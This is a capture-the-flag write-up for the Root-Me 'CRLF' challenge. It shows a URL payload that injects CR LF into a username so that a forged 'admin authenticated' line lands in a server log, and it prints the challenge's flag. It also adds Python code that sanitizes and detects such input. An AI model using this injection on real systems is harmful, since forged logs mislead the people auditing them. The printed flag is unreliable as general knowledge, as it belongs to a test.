CRLF
- Points: 20
- Link: https://www.root-me.org/en/Challenges/Web-Server/CRLF
Statement
Inject false data in the journalisation log.
Analysis

We need to write the following line to the log:

```
admin authenticated
```

The login form does not reject spaces. When I try `admin a`, it logs

```
admin a failed to authenticate
```

This is the vulnerability. A CRLF sequence can be injected to force the logger onto a new line, so the text before it is recorded as its own log entry.
Solution

```
/?username=admin%20authenticated.%0d%0aguest&password=a
```

The flag is

```
rFSP&G0p&5uAg1%
```
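The logger behaviour from the analysis, as an added example (not the challenge's own code): a minimal Python logger that reproduces the injectable entry for the username in the payload above, next to a hardened version that strips control characters, plus a check a defender can use to flag such input before it is written. The log line format is assumed from the write-up.

```python
import re
from urllib.parse import unquote

# Constructed sample input for this example: the username parameter from the
# payload above, percent-decoded (so %20 -> space and %0d%0a -> CR LF).
SAMPLE_USERNAME = unquote("admin%20authenticated.%0d%0aguest")


def log_line_vulnerable(username):
    """Mimic the challenge's logger: the raw username is written as-is."""
    return "%s failed to authenticate" % username


def sanitize_for_log(value):
    """Drop CR, LF and every other ASCII control character from a logged field,
    so one authentication event can never span (or forge) more than one line."""
    return re.sub(r"[\x00-\x1f\x7f]", "", value)


def log_line_safe(username):
    """Hardened logger: the username is sanitized before it enters the entry."""
    return "%s failed to authenticate" % sanitize_for_log(username)


def contains_log_injection(value):
    """Detection hook: True when a field would break the one-line-per-event
    invariant if written raw. Useful for alerting, not just for sanitizing."""
    return re.search(r"[\r\n]", value) is not None


def parse_entries(log_text):
    """Split a log chunk the way a naive line-oriented log reader would."""
    return [line for line in log_text.splitlines() if line]


if __name__ == "__main__":
    # The vulnerable logger yields two entries, the first reading as a success.
    print("vulnerable:", parse_entries(log_line_vulnerable(SAMPLE_USERNAME)))
    # The hardened logger yields exactly one entry for the one failed attempt.
    print("hardened:  ", parse_entries(log_line_safe(SAMPLE_USERNAME)))
    print("flagged:   ", contains_log_injection(SAMPLE_USERNAME))
```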
Summary
This post is licensed under CC BY 4.0 by the author.